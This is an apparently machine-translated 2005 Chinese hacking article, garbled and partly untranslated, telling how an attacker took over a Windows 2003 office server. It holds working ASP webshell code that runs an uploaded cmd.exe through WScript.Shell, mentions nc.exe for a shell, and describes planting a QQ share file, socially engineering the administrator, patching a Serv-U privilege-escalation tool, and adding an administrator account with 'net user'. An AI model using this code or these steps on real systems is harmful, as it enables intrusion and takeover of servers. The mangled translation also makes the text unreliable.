With QQ file sharing vulnerabilities to completely compromise Windows2003 sturdy fortress-bug warning-the black bar safety net

ID MYHACK58:6220055642
Type myhack58
Reporter 佚名
Modified 2005-12-21T00:00:00


On the server running the third party software historically, it is the attacker who is regarded as the invasion of the target system shortcut. Now, the famous Tencent QQ has been included in these shortcut list, but the QQ is not the server the necessary software, so that will not cause a wide range of crisis. The text encountered in the special case although not much, but everyone should still follow the“possible should be precautionary”principle and make the appropriate Defense. One, in Windows 2003 to get the webshell The penetration of the target is a OA Office system server. Itsoperating systemrecently upgraded to Windows 2003, but OA still exist in the asp file upload vulnerability, so the webshell and without any suspense. Hinder is at the elevated encountered--- Landing webshell after the discovery can only view the server's D drive, the C drive can not be any access, webshell prompt is“no permissions”. This point as early as expected, because wenshell only the guests group permissions, plus the win2003 default banned“Everyone"for anonymous users and“Guest"组 权限 用户 访问 cmd.exe that 还 造成 了 不能 通过 webshell 运行 cmd.exe the. Only thankfully using the Webshell can be the D-disk storage of web virtual directories, each subdirectory to read and write. Here in addition to the web virtual directory and some data in the backup file and a Tencent QQ installation directory of the Tencent。 Second, the crack Serv-u the ultimate protection against Windows2003 various default security configuration shows its strong side, one step closer to enhance the existing permissions seem to have been unlikely, until I tried to from the system to start to this server issue the FTP link request and see the Serv-u the banner only but also with a glimmer of hope. Previously mentioned due to the Windows2003 on the cmd. exe permissions restrictions, 通过webshell方式不能运行cmd.exe that such a thesis in 2 0 0 4-year 6-term Defense of the building the Windows 2003 Bastion host on a text had also been mentioned,but practice shows this is not correct, by the webshell Upload a local non-2 0 0 3 in the system is not affected by the limitations of the cmd. exe file to the executable directory, and then through the wscript component, 同样能够通过webshell方式在Windows2003下获得相应权限的cmd.exe the. 结合 nc.exe even also can get a guest group permissions command line under the shell. To this end, I am a veteran webmaster assistant 6. 0 made some improvements, adding the following code 使 其 能够 利用 Wscript.shell 组件 运行 本地 上传 的 cmd.exe the. Function CmdShell() If Request("SP")<>"" Then Session("ShellPath") = Request("SP") ShellPath=Session("ShellPath") if ShellPath="" Then ShellPath = "cmd.exe" if Request("wscript")="yes" then checked=" checked" else checked="" end if If Request("cmd")<>"" Then DefCmd = Request("cmd") SI="<form method=’post’><input name=’cmd’ Style=’width:9 2%’ class=’cmd’ value=’"&DefCmd&"’><input type=’submit’ value=’run’>" SI=SI&"<textarea Style=’width:1 0 0%;height:5 0 0;’ class=’cmd’>" If Request. Form("cmd")<>"" Then if Request. Form("wscript")="yes" then Set CM=CreateObject(ObT(1,0)) Set DD=CM. exec(ShellPath&" /c "&DefCmd) aaa=DD. stdout. readall SI=SI&aaa else%> <object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8 9 4 0-00A0C9054228"></object> <%szTempFile = server. mappath("cmd.txt") Call ws. Run (ShellPath&" /c "&DefCmd & "> " & amp; szTempFile, 0, True) Set fs = CreateObject("Scripting. FileSystemObject") Set oFilelcx = fs. OpenTextFile (szTempFile, 1, False, 0) aaa=Server. HTMLEncode(oFilelcx. ReadAll) oFilelcx. Close Call the fso. DeleteFile(szTempFile, True) SI=SI&aaa end if End If SI=SI&chr(1 3)&"</textarea>" SI=SI& amp;"SHELL path:<input name=’SP’ value=’"&amp; ShellPath&"’ Style=’width:7 0%’>" SI=SI&"<input type=’checkbox’ name=’wscript’ value=’yes’"&checked&">WScript. Shell</form>" Response. Write SI End Function

Use only in the shell path specified in the upload cmd. exe path, and then select the option to Wscript will be able to run some of the permissions required to lower a system command like“net start”or“netstat-an”, and run these two commands after the Webshell echo many services, including Serv-U FTP Server, the active ports list and appear 4 3 9 5 8 port, so I naturally thought of the magical wand of Serv-u ftp Server local privilege escalation vulnerability. Can really use to ftp local privilege escalation tools in the execution of the system command, but there is a 5 3 0 error message such as Figure 1)。 It seems that the administrator or other people on the Serv-u hit on the pudding or do some of the Security Configuration. In order to know exactly how the Security Configuration, Internet search a search of relevant articles, of which the Serv-u ftp Server local privilege escalation vulnerability in the ultimate prevention of very popular, is multi-reproduced, the author is a world outside the high xiaolu it. From the error messages look very likely to do the so-called ultimate Guard, i.e., the ServUDaemon. exe in default of the administrator or the password was modified. Of course this is just assuming that only the target server on the ServUDaemon. exe download down to see the specific configuration can be determined, but the installation with Serv-u of C drive prohibit access, including the Programe files directory, the permissions are elevated again blocked.

Third, the use QQ2005 shared file vulnerability elevation of privilege in the end Again flipped the D drive and see that little can in the server see the Tencent folder. 查看 whatsnew.txt the. That QQ versions QQ2005 Beta1, a few in the relevant file to create the time and also description of the network recently on the Server login through QQ. Don't only use QQ for? After some thought, finally thought of a possible use of the QQ2005 in the file sharing function on a vulnerability. The vulnerability is with the QQ2005 New Year Edition new features appear. It can be a hazard describe: the use of the vulnerability, an attacker can browse, read users system in any of the files such as sam files, data backup files and sensitive information files. Affected system: the installation QQ2005 New Year Edition of the above all of the Windows series ofOS. The specific use of the method is: first in the present machine the landing of their own QQ, call out“QQ menu”, select Tools->set shared, specify C:\or any other beneficial use value of the partition as a shared file, when finished, close the QQ, find the installation directory to your QQ account named folder within the“ShareInfo. db”file. As shown in Figure 3., The Upload overwrite the target server on the same file, such as: D:\Tencent\QQ\654321\ShareInfo.db in. Thus, when the network on the server landing QQ when the friends open the C drive as a shared directory. in. Because strangers are not sharing each other files, so you need to use social engineering to application the administrator is added as a friend(the reason of course the more credible the better). If the administrator through request, the server C drive will be to QQ shared file directory name to be shared, the original can not by WEBSHELL to access the ServUDaemon. the exe file can be downloaded, hampered the elevation of the road can continue. Evening administrator through the application, will I add as a friend. Coral QQ on the displayIP it is the destination server's IP, then download the ServUDaemon. exe file, with the UE after opening the Find 1 2 7. 0. 0. 1, find the default configuration of the built-in account“LocalAdministrator”really be changed to“LocalAdministruser”in. This looks to be a very“ultimate”Defense, but suggested the method of xiaolu does not seem to be offensive to the subject of empathy will be published, to know that the attacker only needs to know the modified configuration, and local elevation of privileges to use the tool will be modified accordingly, so-called ultimate defense will be compromised. The method or use UE open off shell serv-u local privilege escalation to use the tool, the LocalAdministrator to LocalAdministruser. 然后 上传 修改 后 的 ftp2.exe that 在 wscript.shell 中 执行 D:\web\ftp2.exe “net user user password /add”after looking at the results, it has been successfully added one user. Then put the User added to the administrators group and“Remote desktop users”group, after landing the target server's Remote Desktop. ---After many obstacles, finally completely captured by this rugged Windows2003 fortress.

Fourth, the simple revelation

As can be seen, and“the service the less the more secure”, the server running on the“third party”, the less the security, the popular PcAnywhere, VNC, Serv-U privilege escalation and where the proposed use QQ2005 elevated permissions, can all be avoided